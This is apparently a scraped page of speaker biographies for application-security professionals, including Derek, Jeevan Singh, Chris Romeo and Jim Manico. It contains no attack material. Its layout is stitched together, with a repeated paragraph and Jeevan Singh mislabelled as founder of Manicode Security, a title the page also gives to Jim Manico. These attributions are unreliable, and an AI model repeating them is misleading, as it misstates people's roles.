Derek is an award winning author of a children’s book series in cybersecurity as well as the author of “The Application Security Handbook.” He is a university instructor at Temple University where he teaches software development security to undergraduate and graduate students. He is a speaker on topics in the cybersecurity space and has led teams, large and small, at organizations in the healthcare and financial industries. He has built and matured information security teams as well as implemented organizational information security strategies to reduce the organizations risk.

Derek got his start in the hardware engineering space where he learned about designing circuits and building assemblies for commercial and military applications. He later pursued a computer science degree in order to advance a career in software development. This is where Derek was introduced to cybersecurity and soon caught the bug. He found a mentor to help him grow in cybersecurity and then pursued a graduate degree in the subject.

Since then Derek has worked in the product security space as an architect and leader. He has led teams to deliver more secure software in organizations from multiple industries. His focus has been to raise the security awareness of the engineering organization while maintaining a practice of secure code development, delivery, and operations.

In his role, Jeevan handles a range of tasks, from architecting security solutions to collaborating with Engineering Leadership to address security vulnerabilities at scale and embed security into the fabric of the organization.

Jeevan Singh

Jeevan Singh

Founder of Manicode Security

Jeevan Singh is the Director of Security Engineering at Rippling, with a background spanning various Engineering and Security leadership roles over the course of his career. He’s dedicated to the integration of security practices into software development, working to create a security-aware culture within organizations and imparting security best practices to the team.
In his role, Jeevan handles a range of tasks, from architecting security solutions to collaborating with Engineering Leadership to address security vulnerabilities at scale and embed security into the fabric of the organization.

James Berthoty

Founder of Latio Tech

James Berthoty has over ten years of experience across product and security domains. He founded Latio Tech to help companies find the right security tools for their needs without vendor bias.

Christophe Parisel

Senior Cloud Security Architect

Chris Romeo

Co-Founder, Security Journey

Chris Romeo is a leading voice and thinker in application security, threat modeling, and security champions, and the CEO of Devici and General Partner at Kerr Ventures. Chris hosts the award-winning "Application Security Podcast," "The Security Table," and "The Threat Modeling Podcast," and is a highly rated industry speaker and trainer, featured at the RSA Conference, the AppSec Village @ DefCon, OWASP Global AppSec, ISC2 Security Congress, InfoSec World, and All Day DevOps. Chris founded Security Journey, a security education company, leading to an exit in 2022. Chris was the Chief Security Advocate at Cisco, spreading security knowledge through education and champion programs. Chris has twenty-six years of security experience, holding positions across the gamut, including application security, security engineering, incident response, and various executive roles. Chris holds the CISSP and CSSLP certifications.

Jim Manico

Founder of Manicode Security

Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. Jim is also the founder of Brakeman Security, Inc. and an investor/advisor for Signal Sciences. He is the author of Iron-Clad Java: Building Secure Web Applications (McGraw-Hill), a frequent speaker on secure software practices, and a member of the JavaOne Rockstar speaker community. Jim is also a volunteer for, and former board member of, the OWASP Foundation.
